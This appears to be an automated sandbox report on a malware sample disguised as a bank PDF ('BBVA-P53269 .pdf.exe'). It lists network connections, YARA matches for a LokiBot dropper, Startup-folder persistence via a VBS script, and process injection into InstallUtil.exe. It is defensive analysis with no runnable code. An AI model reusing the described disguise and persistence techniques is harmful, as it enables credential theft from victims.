            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60426
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60425
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60424
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60423
            Source: unknownNetwork traffic detected: HTTP traffic on port 60445 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60412 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60433
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60399
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60432
            Source: unknownNetwork traffic detected: HTTP traffic on port 60397 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60398
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60431
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60397
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60430
            Source: unknownNetwork traffic detected: HTTP traffic on port 60454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60396
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60395
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60394
            Source: unknownNetwork traffic detected: HTTP traffic on port 60425 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60393
            Source: unknownNetwork traffic detected: HTTP traffic on port 60406 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60431 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60439
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60438
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60437
            Source: unknownNetwork traffic detected: HTTP traffic on port 60439 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60436
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60435
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60434
            Source: unknownNetwork traffic detected: HTTP traffic on port 60383 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60417 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60440 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60423 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60448 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60391 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60444
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60394 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60442
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60441
            Source: unknownNetwork traffic detected: HTTP traffic on port 60403 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60440
            Source: unknownNetwork traffic detected: HTTP traffic on port 60434 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60451 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60388 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60449
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60448
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60447
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60446
            Source: unknownNetwork traffic detected: HTTP traffic on port 60380 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60445
            Source: unknownNetwork traffic detected: HTTP traffic on port 60418 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60424 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60447 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60455
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60454
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60453
            Source: unknownNetwork traffic detected: HTTP traffic on port 60456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60452
            Source: unknownNetwork traffic detected: HTTP traffic on port 60427 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60433 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60451
            Source: unknownNetwork traffic detected: HTTP traffic on port 60399 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60410 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60450
            Source: unknownNetwork traffic detected: HTTP traffic on port 60404 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60456
            Source: unknownNetwork traffic detected: HTTP traffic on port 60442 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60385 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60415 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60421 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60379 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60393 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60453 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60396 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60409 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60436 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60401 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60382 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60384 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60441 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60422 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60390 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60449 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60429 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60402 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60450 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60435 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
            Source: unknownNetwork traffic detected: HTTP traffic on port 60387 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60381 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60444 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60413 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60409
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60400
            Source: unknownNetwork traffic detected: HTTP traffic on port 60455 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60398 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60407 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60430 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60408
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60407
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60406
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60405
            Source: unknownNetwork traffic detected: HTTP traffic on port 60438 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60404
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60403
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60402
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60401
            Source: unknownHTTPS traffic detected: 204.44.192.90:443 -> 192.168.2.10:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 204.44.192.90:443 -> 192.168.2.10:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49915 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:60380 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000009.00000002.1469533149.0000000003568000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
            Source: 00000004.00000002.1333737955.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: BBVA-P53269 .pdf.exe
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_017BCE684_2_017BCE68
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_017BD1184_2_017BD118
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_017B17A04_2_017B17A0
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_017B23834_2_017B2383
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_017BC4E04_2_017BC4E0
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_017B19D04_2_017B19D0
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_06F200404_2_06F20040
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_06F2001E4_2_06F2001E
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_06F3E8684_2_06F3E868
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0042DACC6_2_0042DACC
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_0072CE689_2_0072CE68
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_0072D1189_2_0072D118
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_007223839_2_00722383
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_0072C4E09_2_0072C4E0
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_062700069_2_06270006
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_062700409_2_06270040
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_0628E8689_2_0628E868
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338873710.0000000006E90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs BBVA-P53269 .pdf.exe
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.00000000035B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirebases.exe vs BBVA-P53269 .pdf.exe
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs BBVA-P53269 .pdf.exe
            Source: BBVA-P53269 .pdf.exe, 00000004.00000000.1278107996.0000000000D42000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameWxrcmozn.exe2 vs BBVA-P53269 .pdf.exe
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314117067.00000000013CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs BBVA-P53269 .pdf.exe
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.0000000003165000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirebases.exe vs BBVA-P53269 .pdf.exe
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000041F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirebases.exe vs BBVA-P53269 .pdf.exe
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.0000000004299000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWxrcmozn.exe2 vs BBVA-P53269 .pdf.exe
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs BBVA-P53269 .pdf.exe
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZzrnngjehh.dll" vs BBVA-P53269 .pdf.exe
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.00000000030F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs BBVA-P53269 .pdf.exe
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1336485810.00000000061D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameZzrnngjehh.dll" vs BBVA-P53269 .pdf.exe
            Source: BBVA-P53269 .pdf.exeBinary or memory string: OriginalFilenameWxrcmozn.exe2 vs BBVA-P53269 .pdf.exe
            Source: BBVA-P53269 .pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 00000009.00000002.1469533149.0000000003568000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000004.00000002.1333737955.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: BBVA-P53269 .pdf.exe, EditorModel.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.BBVA-P53269 .pdf.exe.43cd9f8.1.raw.unpack, EditorModel.csCryptographic APIs: 'TransformFinalBlock'
            Source: BBVA-P53269 .pdf.exe, FactoryExplorer.csTask registration methods: 'CreateRemoteTask'
            Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
            Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
            Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
            Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
            Source: 4.2.BBVA-P53269 .pdf.exe.43cd9f8.1.raw.unpack, FactoryExplorer.csTask registration methods: 'CreateRemoteTask'
            Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
            Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
            Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
            Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
            Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, InstallUtil.exe, 00000006.00000002.3746600843.0000000000401000.00000040.00000400.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1469533149.0000000003568000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: F*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
            Source: InstallUtil.exeBinary or memory string: B*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
            Source: InstallUtil.exe, 00000006.00000002.3746600843.000000000046A000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3746594015.0000000000451000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: B*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp %m
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/16@3/3
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs"
            Source: BBVA-P53269 .pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: BBVA-P53269 .pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: LoginData.6.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: BBVA-P53269 .pdf.exeVirustotal: Detection: 40%
            Source: BBVA-P53269 .pdf.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeFile read: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe "C:\Users\user\Desktop\BBVA-P53269 .pdf.exe"
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\AllData.exe "C:\Users\user\AppData\Roaming\AllData.exe"
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\AllData.exe "C:\Users\user\AppData\Roaming\AllData.exe" Jump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msvbvm60.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vb6zz.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cdosys.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: inetcomm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msoert2.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: inetres.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: activeds.dllJump to behavior
